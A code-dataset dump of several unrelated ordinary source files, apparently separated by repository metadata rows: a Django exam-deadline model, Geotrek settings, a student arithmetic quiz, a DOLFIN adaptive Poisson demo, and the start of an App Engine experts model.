# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import datetime
from django.db import models
from base.models.enums import number_session
from base.signals.publisher import compute_student_score_encoding_deadline
from osis_common.models.osis_model_admin import OsisModelAdmin
class SessionExamDeadlineAdmin(OsisModelAdmin):
    """Django admin configuration for SessionExamDeadline records."""
    list_display = ('offer_enrollment', 'deadline', 'deadline_tutor', 'number_session', 'changed')
    list_filter = ('number_session',)
    # raw_id widget avoids loading every offer enrollment into a dropdown.
    raw_id_fields = ('offer_enrollment',)
    search_fields = ['offer_enrollment__student__person__first_name', 'offer_enrollment__student__person__last_name',
                     'offer_enrollment__student__registration_id', 'offer_enrollment__education_group_year__acronym']
class SessionExamDeadline(models.Model):
    """Score-encoding deadline of one offer enrollment for a given exam session."""
    external_id = models.CharField(max_length=100, blank=True, null=True, db_index=True)
    changed = models.DateTimeField(null=True, auto_now=True)
    deadline = models.DateField()
    deliberation_date = models.DateField(blank=True, null=True)
    deadline_tutor = models.IntegerField(null=True, blank=True)  # Delta day(s)
    number_session = models.IntegerField(choices=number_session.NUMBERS_SESSION)
    offer_enrollment = models.ForeignKey('OfferEnrollment', on_delete=models.CASCADE)

    # Snapshot of deliberation_date taken at instantiation; save() compares
    # against it to detect changes (name-mangled to stay private to this class).
    __original_deliberation_date = None

    def __init__(self, *args, **kwargs):
        super(SessionExamDeadline, self).__init__(*args, **kwargs)
        self.__original_deliberation_date = self.deliberation_date

    def save(self, *args, **kwargs):
        """Persist the row and, if deliberation_date changed, fire the signal
        that triggers recomputation of student score-encoding deadlines."""
        super(SessionExamDeadline, self).save(*args, **kwargs)
        if self.deliberation_date != self.__original_deliberation_date:
            compute_student_score_encoding_deadline.send(sender=self.__class__, session_exam_deadline=self)

    @property
    def deadline_tutor_computed(self):
        # Tutor deadline = student deadline minus the tutor delta (in days);
        # None when no delta is set.
        return compute_deadline_tutor(self.deadline, self.deadline_tutor)

    @property
    def is_deadline_reached(self):
        return self.deadline < datetime.date.today()

    @property
    def is_deadline_tutor_reached(self):
        # Falls back to the student deadline when no tutor deadline exists.
        if self.deadline_tutor_computed:
            return self.deadline_tutor_computed < datetime.date.today()
        return self.is_deadline_reached

    def __str__(self):
        return u"%s-%s" % (self.offer_enrollment, self.number_session)
def compute_deadline_tutor(deadline, deadline_tutor):
    """Return `deadline` shifted back by `deadline_tutor` days, or None.

    A None delta means no tutor-specific deadline exists.
    """
    if deadline_tutor is None:
        return None
    return deadline - datetime.timedelta(days=deadline_tutor)
def filter_by_nb_session(nb_session):
    """Return a queryset of all deadlines for the given session number."""
    return SessionExamDeadline.objects.filter(number_session=nb_session)
def get_by_offer_enrollment_nb_session(offer_enrollment, nb_session):
    """Return the deadline for (offer_enrollment, session), or None if absent."""
    try:
        return SessionExamDeadline.objects.get(offer_enrollment=offer_enrollment.id,
                                               number_session=nb_session)
    except SessionExamDeadline.DoesNotExist:
        return None
| agpl-3.0 | -3,591,662,348,334,433,300 | 42.072917 | 117 | 0.685127 | false | 3.897267 | false | false | false |
mabhub/Geotrek | geotrek/settings/base.py | 1 | 17906 | import os
import sys
from django.contrib.messages import constants as messages
from geotrek import __version__
from . import PROJECT_ROOT_PATH
def gettext_noop(s):
    """Mark *s* for later translation without translating it now."""
    return s
# --- Core flags and database configuration ---
DEBUG = False
TEMPLATE_DEBUG = DEBUG
TEST = 'test' in sys.argv
VERSION = __version__
ADMINS = (
    ('Makina Corpus', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis',
        'OPTIONS': {},
        'NAME': '',      # Or path to database file if using sqlite3.
        'USER': '',      # Not used with sqlite3.
        'PASSWORD': '',  # Not used with sqlite3.
        'HOST': '',      # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '',      # Set to empty string for default. Not used with sqlite3.
    }
}
#
# PostgreSQL Schemas for apps and models.
#
# Caution: editing this setting might not be enough.
# Indeed, it won't apply to apps that not managed of South, nor database views and functions.
# See all sql/*-schemas.sql files in each Geotrek app.
#
DATABASE_SCHEMAS = {
    'default': 'geotrek',
    'auth': 'django',
    'django': 'django',
    'easy_thumbnails': 'django',
    'south': 'django',
    'feedback': 'gestion',
    'infrastructure': 'gestion',
    'maintenance': 'gestion',
    'tourism': 'tourisme',
    'trekking': 'rando',
    'zoning': 'zonage',
    'land': 'foncier',
}
# Put every mapped schema on the connection search_path so cross-schema
# queries resolve without qualification.
DATABASES['default']['OPTIONS'] = {
    'options': '-c search_path=public,%s' % ','.join(set(DATABASE_SCHEMAS.values()))
}
#
# Authentication
#
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',)
AUTH_PROFILE_MODULE = 'authent.UserProfile'
# Settings required for geotrek.authent.backend.DatabaseBackend :
AUTHENT_DATABASE = None
AUTHENT_TABLENAME = None
# Maps Geotrek roles to numeric group ids used by the external authent table.
AUTHENT_GROUPS_MAPPING = {
    'PATH_MANAGER': 1,
    'TREKKING_MANAGER': 2,
    'EDITOR': 3,
    'READER': 4,
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/Paris'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'fr'
MODELTRANSLATION_DEFAULT_LANGUAGE = LANGUAGE_CODE
LANGUAGES = (
    ('en', gettext_noop('English')),
    ('fr', gettext_noop('French')),
    ('it', gettext_noop('Italian')),
    ('es', gettext_noop('Spanish')),
)
LOCALE_PATHS = (
    os.path.join(PROJECT_ROOT_PATH, 'locale'),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
DATE_INPUT_FORMATS = ('%d/%m/%Y',)
ROOT_URL = ''
LOGIN_URL = 'login'
LOGOUT_URL = 'logout'
LOGIN_REDIRECT_URL = 'home'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT_PATH, 'media')
UPLOAD_DIR = 'upload'    # media root subdir
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
MEDIA_URL_SECURE = '/media_secure/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    os.path.join(PROJECT_ROOT_PATH, 'static'),
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
    'compressor.finders.CompressorFinder',
)
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
COMPRESSOR_ENABLED = False
COMPRESS_PARSER = 'compressor.parser.HtmlParser'
# Make this unique, and don't share it with anybody.
# NOTE(review): placeholder value — must be overridden per instance,
# never deployed as-is.
SECRET_KEY = 'public_key'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
# Order matters: session before auth, locale middlewares before CSRF.
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'geotrek.authent.middleware.LocaleForcedMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'geotrek.common.middleware.APILocaleMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'geotrek.authent.middleware.CorsMiddleware',
    'mapentity.middleware.AutoLoginMiddleware'
)
ROOT_URLCONF = 'geotrek.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'geotrek.wsgi.application'
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.auth.context_processors.auth',
    'django.core.context_processors.debug',
    'django.core.context_processors.i18n',
    'django.core.context_processors.media',
    'django.core.context_processors.static',
    'django.core.context_processors.tz',
    'django.core.context_processors.request',
    'django.contrib.messages.context_processors.messages',
    'mapentity.context_processors.settings',
)
#
# /!\ Application names (last levels) must be unique
# (c.f. auth/authent)
# https://code.djangoproject.com/ticket/12288
#
PROJECT_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    'django.contrib.admindocs',
    'django.contrib.gis',
)
# Do not migrate translated fields, they differ per instance, and
# can be added/removed using `update_translation_fields`
if 'schemamigration' not in sys.argv:
    PROJECT_APPS += ('modeltranslation',)
# Third-party applications.
PROJECT_APPS += (
    'south',
    'leaflet',
    'floppyforms',
    'crispy_forms',
    'compressor',
    'djgeojson',
    'tinymce',
    'easy_thumbnails',
    'shapes',
    'paperclip',
    'mapentity',
    'rest_framework',
    'embed_video',
    'djcelery',
)
# Geotrek's own applications come last so they can override templates/statics.
INSTALLED_APPS = PROJECT_APPS + (
    'geotrek.cirkwi',
    'geotrek.authent',
    'geotrek.common',
    'geotrek.altimetry',
    'geotrek.core',
    'geotrek.infrastructure',
    'geotrek.maintenance',
    'geotrek.zoning',
    'geotrek.land',
    'geotrek.trekking',
    'geotrek.tourism',
    'geotrek.flatpages',
    'geotrek.feedback',
)
SERIALIZATION_MODULES = {
    'geojson': 'djgeojson.serializers'
}
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
    },
    # The fat backend is used to store big chunk of data (>1 Mo)
    'fat': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
    }
}
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'formatters': {
        'simple': {
            'format': '%(levelname)s %(asctime)s %(name)s %(message)s'
        },
    },
    'handlers': {
        # NOTE(review): despite its name, 'mail_admins' is a NullHandler here,
        # so it discards records — presumably overridden per instance; confirm.
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'logging.NullHandler'
        },
        'console': {
            'level': 'WARNING',
            'class': 'logging.StreamHandler',
            'formatter': 'simple'
        },
    },
    'loggers': {
        'django.db.backends': {
            'handlers': ['console', 'mail_admins'],
            'level': 'ERROR',
            'propagate': False,
        },
        'django.request': {
            'handlers': ['console', 'mail_admins'],
            'level': 'ERROR',
            'propagate': False,
        },
        'django': {
            'handlers': ['console', 'mail_admins'],
            'level': 'ERROR',
            'propagate': False,
        },
        'south': {
            'handlers': ['console', 'mail_admins'],
            'level': 'ERROR',
            'propagate': False,
        },
        'geotrek': {
            'handlers': ['console', 'mail_admins'],
            'level': 'INFO',
            'propagate': False,
        },
        'mapentity': {
            'handlers': ['console', 'mail_admins'],
            'level': 'INFO',
            'propagate': False,
        },
        # Root logger: catch-all for everything not matched above.
        '': {
            'handlers': ['console', 'mail_admins'],
            'level': 'INFO',
            'propagate': False,
        },
    }
}
# --- Thumbnails, attachments, projections and map configuration ---
THUMBNAIL_ALIASES = {
    '': {
        'thumbnail': {'size': (150, 150)},
        # Thumbnails for public trek website
        'small-square': {'size': (120, 120), 'crop': True},
        'medium': {'size': (800, 800)},
        # Header image for trek export (keep ratio of TREK_EXPORT_HEADER_IMAGE_SIZE)
        'print': {'size': (1000, 500), 'crop': 'smart'},
    },
}
PAPERCLIP_CONFIG = {
    'ENABLE_VIDEO': True,
    'FILETYPE_MODEL': 'common.FileType',
    'ATTACHMENT_TABLE_NAME': 'fl_t_fichier',
}
# Data projection
SRID = 3857
# API projection (client-side), can differ from SRID (database). Leaflet requires 4326.
API_SRID = 4326
# Extent in native projection (Toulouse area)
SPATIAL_EXTENT = (144968, 5415668, 175412, 5388753)
MAPENTITY_CONFIG = {
    'TITLE': gettext_noop("Geotrek"),
    'TEMP_DIR': '/tmp',
    'HISTORY_ITEMS_MAX': 7,
    'CONVERSION_SERVER': 'http://127.0.0.1:6543',
    'CAPTURE_SERVER': 'http://127.0.0.1:8001',
    'ROOT_URL': ROOT_URL,
    'MAP_BACKGROUND_FOGGED': True,
    'GEOJSON_LAYERS_CACHE_BACKEND': 'fat',
    'SENDFILE_HTTP_HEADER': 'X-Accel-Redirect',
    'DRF_API_URL_PREFIX': r'^api/(?P<lang>\w+)/',
}
DEFAULT_STRUCTURE_NAME = gettext_noop('Default')
VIEWPORT_MARGIN = 0.1  # On list page, around spatial extent from settings.ini
PATHS_LINE_MARKER = 'dotL'
PATH_SNAPPING_DISTANCE = 1  # Distance of path snapping in meters
SNAP_DISTANCE = 30  # Distance of snapping in pixels
# Altimetric profile rendering parameters.
ALTIMETRIC_PROFILE_PRECISION = 25  # Sampling precision in meters
ALTIMETRIC_PROFILE_BACKGROUND = 'white'
ALTIMETRIC_PROFILE_COLOR = '#F77E00'
ALTIMETRIC_PROFILE_HEIGHT = 400
ALTIMETRIC_PROFILE_WIDTH = 800
ALTIMETRIC_PROFILE_FONTSIZE = 25
ALTIMETRIC_PROFILE_FONT = 'ubuntu'
ALTIMETRIC_PROFILE_MIN_YSCALE = 1200  # Minimum y scale (in meters)
ALTIMETRIC_AREA_MAX_RESOLUTION = 150  # Maximum number of points (by width/height)
ALTIMETRIC_AREA_MARGIN = 0.15
# Let this be defined at instance-level
LEAFLET_CONFIG = {
    'SRID': SRID,
    'TILES': [
        ('Scan', 'http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',),
        ('Ortho', 'http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.jpg'),
    ],
    'TILES_EXTENT': SPATIAL_EXTENT,
    # Extent in API projection (Leaflet view default extent)
    'SPATIAL_EXTENT': (1.3, 43.7, 1.5, 43.5),
    'NO_GLOBALS': False,
    'PLUGINS': {
        'geotrek': {'js': ['core/leaflet.lineextremities.js',
                           'core/leaflet.textpath.js',
                           'trekking/points_reference.js',
                           'trekking/parking_location.js']},
        'topofields': {'js': ['core/geotrek.forms.snap.js',
                              'core/geotrek.forms.topology.js',
                              'core/dijkstra.js',
                              'core/multipath.js',
                              'core/topology_helper.js']}
    }
}
""" This *pool* of colors is used to colorized lands records.
"""
COLORS_POOL = {'land': ['#f37e79', '#7998f3', '#bbf379', '#f379df', '#f3bf79', '#9c79f3', '#7af379'],
               'physical': ['#f3799d', '#79c1f3', '#e4f379', '#de79f3', '#79f3ba', '#f39779', '#797ff3'],
               'competence': ['#a2f379', '#f379c6', '#79e9f3', '#f3d979', '#b579f3', '#79f392', '#f37984'],
               'signagemanagement': ['#79a8f3', '#cbf379', '#f379ee', '#79f3e3', '#79f3d3'],
               'workmanagement': ['#79a8f3', '#cbf379', '#f379ee', '#79f3e3', '#79f3d3'],
               'restrictedarea': ['plum', 'violet', 'deeppink', 'orchid',
                                  'darkviolet', 'lightcoral', 'palevioletred',
                                  'MediumVioletRed', 'MediumOrchid', 'Magenta',
                                  'LightSalmon', 'HotPink', 'Fuchsia']}
MAP_STYLES = {
    'path': {'weight': 2, 'opacity': 1.0, 'color': '#FF4800'},
    'city': {'weight': 4, 'color': 'orange', 'opacity': 0.3, 'fillOpacity': 0.0},
    'district': {'weight': 6, 'color': 'orange', 'opacity': 0.3, 'fillOpacity': 0.0, 'dashArray': '12, 12'},
    'restrictedarea': {'weight': 2, 'color': 'red', 'opacity': 0.5, 'fillOpacity': 0.5},
    'land': {'weight': 4, 'color': 'red', 'opacity': 1.0},
    'physical': {'weight': 6, 'color': 'red', 'opacity': 1.0},
    'competence': {'weight': 4, 'color': 'red', 'opacity': 1.0},
    'workmanagement': {'weight': 4, 'color': 'red', 'opacity': 1.0},
    'signagemanagement': {'weight': 5, 'color': 'red', 'opacity': 1.0},
    'print': {
        'path': {'weight': 1},
        'trek': {'color': '#FF3300', 'weight': 7, 'opacity': 0.5,
                 'arrowColor': 'black', 'arrowSize': 10},
    }
}
# --- Layer tuning, feature flags, mobile tiles and Celery configuration ---
LAYER_PRECISION_LAND = 4  # Number of fraction digit
LAYER_SIMPLIFY_LAND = 10  # Simplification tolerance
LAND_BBOX_CITIES_ENABLED = True
LAND_BBOX_DISTRICTS_ENABLED = True
LAND_BBOX_AREAS_ENABLED = False
PUBLISHED_BY_LANG = True
# Export page sizes (width, height), presumably in centimeters — confirm
# against the export templates.
EXPORT_MAP_IMAGE_SIZE = {
    'trek': (14.1, 11),
    'poi': (14.1, 11),
    'touristiccontent': (14.1, 11),
    'touristicevent': (14.1, 11),
}
EXPORT_HEADER_IMAGE_SIZE = {
    'trek': (10.7, 5.35),  # Keep ratio of THUMBNAIL_ALIASES['print']
    'poi': (10.7, 5.35),  # Keep ratio of THUMBNAIL_ALIASES['print']
    'touristiccontent': (10.7, 5.35),  # Keep ratio of THUMBNAIL_ALIASES['print']
    'touristicevent': (10.7, 5.35),  # Keep ratio of THUMBNAIL_ALIASES['print']
}
COMPLETENESS_FIELDS = {
    'trek': ['departure', 'duration', 'difficulty', 'description_teaser']
}
TRAIL_MODEL_ENABLED = True
TREKKING_TOPOLOGY_ENABLED = True
FLATPAGES_ENABLED = False  # False because still experimental
TOURISM_ENABLED = False  # False because still experimental
TREK_POI_INTERSECTION_MARGIN = 500  # meters (used only if TREKKING_TOPOLOGY_ENABLED = False)
TOURISM_INTERSECTION_MARGIN = 500  # meters (always used)
SIGNAGE_LINE_ENABLED = False
TREK_POINTS_OF_REFERENCE_ENABLED = True
TREK_EXPORT_POI_LIST_LIMIT = 14
TREK_EXPORT_INFORMATION_DESK_LIST_LIMIT = 2
TREK_DAY_DURATION = 10  # Max duration to be done in one day
TREK_ICON_SIZE_POI = 18
TREK_ICON_SIZE_PARKING = 18
TREK_ICON_SIZE_INFORMATION_DESK = 18
# Static offsets in projection units
TOPOLOGY_STATIC_OFFSETS = {'land': -5,
                           'physical': 0,
                           'competence': 5,
                           'signagemanagement': -10,
                           'workmanagement': 10}
# Maps Django message levels onto Bootstrap alert CSS classes.
MESSAGE_TAGS = {
    messages.SUCCESS: 'alert-success',
    messages.INFO: 'alert-info',
    messages.DEBUG: 'alert-info',
    messages.WARNING: 'alert-error',
    messages.ERROR: 'alert-error',
}
CACHE_TIMEOUT_LAND_LAYERS = 60 * 60 * 24
CACHE_TIMEOUT_TOURISM_DATASOURCES = 60 * 60 * 24
TREK_CATEGORY_ORDER = None
TOURISTIC_EVENT_CATEGORY_ORDER = None
SPLIT_TREKS_CATEGORIES_BY_PRACTICE = False
SPLIT_TREKS_CATEGORIES_BY_ACCESSIBILITY = False
HIDE_PUBLISHED_TREKS_IN_TOPOLOGIES = False
ZIP_TOURISTIC_CONTENTS_AS_POI = False
CRISPY_ALLOWED_TEMPLATE_PACKS = ('bootstrap', 'bootstrap3')
CRISPY_TEMPLATE_PACK = 'bootstrap'
# Mobile app_directories
MOBILE_TILES_URL = 'http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'
MOBILE_TILES_RADIUS_LARGE = 0.01  # ~1 km
MOBILE_TILES_RADIUS_SMALL = 0.005  # ~500 m
MOBILE_TILES_GLOBAL_ZOOMS = range(13)
MOBILE_TILES_LOW_ZOOMS = range(13, 15)
MOBILE_TILES_HIGH_ZOOMS = range(15, 17)
# Celery (asynchronous tasks) configuration, via django-celery.
import djcelery
djcelery.setup_loader()
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
BROKER_URL = 'redis://127.0.0.1:6379/0'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TASK_RESULT_EXPIRES = 5
TEST_RUNNER = 'djcelery.contrib.test_runner.CeleryTestSuiteRunner'
| bsd-2-clause | -7,784,692,578,393,617,000 | 30.414035 | 108 | 0.631744 | false | 3.229798 | true | false | false |
sojournexx/python | Assignments/TanAndrew_assign6.py | 1 | 5318 | #Andrew Tan, 3/25, Section 010
import myfunctions
import random
#Ask user for inputs, re-prompting until each one is valid
while True:
    qns = int(input("How many problems would you like to attempt? "))
    if qns > 0:
        break
    print("Invalid number, try again\n")

while True:
    width = int(input("How wide do you want your digits to be? 5-10: "))
    if 5 <= width <= 10:
        break
    print("Invalid width, try again\n")

while True:
    drill = str.lower(input("Would you like to activate 'drill' mode? yes or no: "))
    if drill in ("yes", "no"):
        break
    print("Invalid response, try again\n")

print("\nHere we go!")
#Define variables to track score and statistics.
# tscore: total correct answers (non-drill mode only).
# addition/subtraction/multiplication/division: problems presented per operator.
# *_score: correct answers per operator in normal mode, but number of WRONG
# attempts per operator in drill mode (see the results section below).
tscore = 0
addition = 0
subtraction = 0
multiplication = 0
division = 0
addition_score = 0
subtraction_score = 0
multiplication_score = 0
division_score = 0
#Set number of questions
# Digit-drawing helpers indexed by digit value. Replaces two duplicated
# 20-branch if/elif chains with a single table lookup.
digit_painters = [myfunctions.number_0, myfunctions.number_1, myfunctions.number_2,
                  myfunctions.number_3, myfunctions.number_4, myfunctions.number_5,
                  myfunctions.number_6, myfunctions.number_7, myfunctions.number_8,
                  myfunctions.number_9]
for i in range(qns):
    print("\nWhat is .....\n")
    #Define parameters
    x = random.randint(0, 9)
    op = random.randint(1, 4)
    y = random.randint(0, 9)
    #Check for valid division equation: non-zero divisor, whole-number result
    if op == 4:
        if y == 0:
            y = random.randint(1, 9)
        while x % y != 0:
            x = random.randint(0, 9)
            y = random.randint(1, 9)
    #Display first number
    digit_painters[x](width)
    #Display operator and tally the problem type presented
    if op == 1:
        op = "+"
        myfunctions.plus(width)
        addition += 1
    elif op == 2:
        op = "-"
        myfunctions.minus(width)
        subtraction += 1
    elif op == 3:
        op = "*"
        myfunctions.multiply(width)
        multiplication += 1
    elif op == 4:
        op = "/"
        myfunctions.divide(width)
        division += 1
    #Display second number
    digit_painters[y](width)
    #Ask user for answer and check answer
    if drill == "no":
        # Single attempt: a correct answer bumps the per-operator score.
        z = int(input("= "))
        if myfunctions.check_answer(x, y, z, op):
            print("Correct!")
            tscore += 1
            if op == "+":
                addition_score += 1
            if op == "-":
                subtraction_score += 1
            if op == "*":
                multiplication_score += 1
            if op == "/":
                division_score += 1
        else:
            print("Sorry, that's not correct.")
    elif drill == "yes":
        # Drill mode: repeat until correct; each WRONG attempt bumps the
        # per-operator counter ("extra attempts needed").
        while True:
            z = int(input("= "))
            if not myfunctions.check_answer(x, y, z, op):
                print("Sorry, that's not correct.")
                if op == "+":
                    addition_score += 1
                if op == "-":
                    subtraction_score += 1
                if op == "*":
                    multiplication_score += 1
                if op == "/":
                    division_score += 1
                continue
            else:
                print("Correct!")
                break
#Display score
if drill == "no":
print("\nYou got %d out of %d correct!" %(tscore, qns))
for operator, count, score in zip(["addition", "subtraction", "multiplication", "division"], [addition, subtraction, multiplication, division], [addition_score, subtraction_score, multiplication_score, division_score]):
if count == 0:
print("\nNo %s problems presented" %(operator))
else:
print("\nTotal %s problems presented: %d" %(operator, count))
print("Correct %s problems: %d (%s)" %(operator, score, format(score/count, ".1%")))
elif drill == "yes":
for operator, count, score in zip(["addition", "subtraction", "multiplication", "division"], [addition, subtraction, multiplication, division], [addition_score, subtraction_score, multiplication_score, division_score]):
if score == 0:
praise = "(perfect!)"
else:
praise = ""
if count == 0:
print("\nNo %s problems presented" %(operator))
else:
print("\nTotal %s problems presented: %d" %(operator, count))
print("# of extra attempts needed: %d %s" %(score, praise))
| mit | -6,892,856,213,811,609,000 | 28.045198 | 223 | 0.511847 | false | 3.924723 | false | false | false |
FEniCS/dolfin | demo/undocumented/adaptive-poisson/python/demo_adaptive-poisson.py | 1 | 2889 | """This demo program solves Poisson's equation
- div grad u(x, y) = f(x, y)
on the unit square with source f given by
f(x, y) = exp(-100(x^2 + y^2))
and homogeneous Dirichlet boundary conditions.
Note that we use a simplified error indicator, ignoring
edge (jump) terms and the size of the interpolation constant.
"""
# Copyright (C) 2008 Rolv Erlend Bredesen
#
# This file is part of DOLFIN.
#
# DOLFIN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DOLFIN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DOLFIN. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by Anders Logg 2008-2011
from __future__ import print_function
from dolfin import *
from numpy import array, sqrt
from math import pow
from six.moves import xrange as range
TOL = 5e-4          # Error tolerance
REFINE_RATIO = 0.50 # Refine 50 % of the cells in each iteration
MAX_ITER = 20       # Maximal number of iterations

# Create initial mesh
mesh = UnitSquareMesh(4, 4)

# Source term kept both as a C++ expression string (for assembly) and as a
# Python lambda (for evaluating the cell-wise error indicator).
source_str = "exp(-100.0*(pow(x[0], 2) + pow(x[1], 2)))"
source = eval("lambda x: " + source_str)

# Adaptive algorithm: solve -> estimate -> mark -> refine.
for level in range(MAX_ITER):

    # Define variational problem (P1 Lagrange elements)
    V = FunctionSpace(mesh, "CG", 1)
    v = TestFunction(V)
    u = TrialFunction(V)
    f = Expression(source_str, degree=2)
    a = dot(grad(v), grad(u))*dx
    L = v*f*dx

    # Define homogeneous Dirichlet boundary condition
    u0 = Constant(0.0)
    bc = DirichletBC(V, u0, DomainBoundary())

    # Compute solution
    u = Function(V)
    solve(a == L, u, bc)

    # Compute error indicators gamma_T = h_T * |f(midpoint)| * sqrt(|T|)
    # (simplified: jump terms and interpolation constants are ignored,
    # as stated in the module docstring).
    h = array([c.h() for c in cells(mesh)])
    K = array([c.volume() for c in cells(mesh)])
    R = array([abs(source([c.midpoint().x(), c.midpoint().y()])) for c in cells(mesh)])
    gamma = h*R*sqrt(K)

    # Compute global error estimate (l2 sum of indicators, MPI-reduced)
    E = sum([g*g for g in gamma])
    E = sqrt(MPI.sum(mesh.mpi_comm(), E))
    print("Level %d: E = %g (TOL = %g)" % (level, E, TOL))

    # Check convergence
    if E < TOL:
        info("Success, solution converged after %d iterations" % level)
        break

    # Mark the REFINE_RATIO fraction of cells with the largest indicators;
    # the threshold is synchronised across MPI ranks via max.
    cell_markers = MeshFunction("bool", mesh, mesh.topology().dim())
    gamma_0 = sorted(gamma, reverse=True)[int(len(gamma)*REFINE_RATIO)]
    gamma_0 = MPI.max(mesh.mpi_comm(), gamma_0)
    for c in cells(mesh):
        cell_markers[c] = gamma[c.index()] > gamma_0

    # Refine mesh
    mesh = refine(mesh, cell_markers)

# Plot mesh
plot(mesh)
| lgpl-3.0 | -1,866,448,215,433,288,200 | 29.410526 | 87 | 0.661821 | false | 3.324511 | false | false | false |
theintencity/flash-videoio | examples/django-apps/project/experts/models.py | 1 | 3541 | import datetime
from google.appengine.api import users
from google.appengine.ext import db
class User(db.Model):
    """Datastore model for an expert profile tied to a Google account."""
    name = db.StringProperty('Full Name')
    account = db.UserProperty()
    phone_number = db.PhoneNumberProperty('Phone Number')
    address = db.PostalAddressProperty('Postal Address')
    website = db.StringProperty('Homepage URL')
    description = db.TextProperty('Brief Biography')
    rating = db.FloatProperty(default=0.0)        # aggregate rating value
    rating_count = db.IntegerProperty(default=0)  # number of ratings received
    tags = db.StringListProperty('Expertise, one per line', default=None)
    availability = db.TextProperty('Availability', default='Available by appointment on weekdays in PST timezone')
    has_chat = db.BooleanProperty('Use Google Chat', default=False)

    def email(self):
        """Return the account's email, appending @gmail.com to bare nicknames."""
        result = self.account.nickname() if self.account else ''
        return (result + '@gmail.com') if result and '@' not in result else result
def get_current_user():
    """Return the User entity for the signed-in Google account.

    Creates and stores the entity on first visit; when nobody is signed
    in, returns an unsaved anonymous User with is_active = False. The
    is_active/is_staff flags are transient (not datastore properties).
    """
    account = users.get_current_user()
    if not account:
        anonymous = User()
        anonymous.is_active = False
        return anonymous
    user = db.GqlQuery('SELECT * FROM User WHERE account = :1', account).get()
    if not user:
        user = User(name='', account=account)
        user.put()
    user.is_active = True
    user.is_staff = users.is_current_user_admin()
    return user
class Tag(db.Model):
    """An expertise tag with a usage count for popularity ranking."""
    name = db.StringProperty(required=True)
